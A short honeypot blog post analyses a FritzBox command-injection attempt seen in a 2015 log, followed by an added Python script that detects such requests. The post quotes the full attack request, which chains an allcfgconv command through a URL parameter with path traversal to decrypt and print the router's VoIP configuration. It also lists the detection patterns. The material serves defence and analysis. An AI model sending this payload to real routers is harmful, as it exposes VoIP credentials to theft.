Wednesday, 27 May 2015

That's new: allcfgconv attack seen in the wild

According to my last log files from yesterday, there was an attack which included an allcfgconv statement:

 beeswarm [mypyfwa] 2015-05-28 06:45:30.048870 get /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -c voip -c -o - ../../../../../var/tmp/voip.cfg %26 http/1.1 162.248.50.159 US Path
The original log file shows:

 162.248.50.159 - - [27/May/2015:09:29:39 +0200] "GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -C voip -c -o - ../../../../../var/tmp/voip.cfg %26 HTTP/1.1" 404 493 "-" "-"
As I was unaware of the statement, I did some short research, and allcfgconv seems to be related to the FritzBox; see the manual here.
So this attack passed the following options:
  • -C voip: use the voip config type
  • -c: decrypt the password
  • -o: print the config
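As an added example (not part of the original post), a small detector that parses access-log lines like the one above, percent-decodes the query string so that the `%26` becomes the `&` that chains the second command, and reports the injected command together with the other indicators. The first sample line is the request quoted in the post; the second is a constructed benign request for comparison.

```python
import re
from urllib.parse import parse_qs

# Constructed sample log: line 1 is the request from the post, line 2 is a
# made-up benign request that legitimately uses getpage=../html/...
SAMPLE_LOG = """\
162.248.50.159 - - [27/May/2015:09:29:39 +0200] "GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -C voip -c -o - ../../../../../var/tmp/voip.cfg %26 HTTP/1.1" 404 493 "-" "-"
10.0.0.5 - - [27/May/2015:09:30:01 +0200] "GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=de HTTP/1.1" 200 1024 "-" "-"
"""

# Apache/nginx combined log format; the non-greedy target group tolerates the
# spaces that an injected shell command puts into the request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Characters that chain or substitute a second command in a shell.
SHELL_SEP = re.compile(r'[&;|`$]')


def analyse(line):
    """Parse one log line and report command-injection indicators in its query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    _, _, query = m.group("target").partition("?")
    params = parse_qs(query, keep_blank_values=True)  # percent-decodes values: %26 -> &
    indicators, commands = set(), []
    for values in params.values():
        for value in values:
            if SHELL_SEP.search(value):
                indicators.add("shell_metachar")
                # every non-empty segment between separators is a chained command
                commands += [seg.strip() for seg in SHELL_SEP.split(value) if seg.strip()]
            if "../" in value:
                indicators.add("path_traversal")
            if "allcfgconv" in value.lower():
                indicators.add("allcfgconv")
    return {"ip": m.group("ip"), "status": m.group("status"),
            "indicators": sorted(indicators), "commands": commands}


def scan(log_text):
    """Return the analysis of every line whose query string carries a shell metacharacter."""
    return [r for r in map(analyse, log_text.splitlines())
            if r and "shell_metachar" in r["indicators"]]
```

Note that `path_traversal` alone is not a verdict here: the FritzBox UI itself passes `getpage=../html/...`, so the benign line also triggers it, and only the chained command is what separates the two requests.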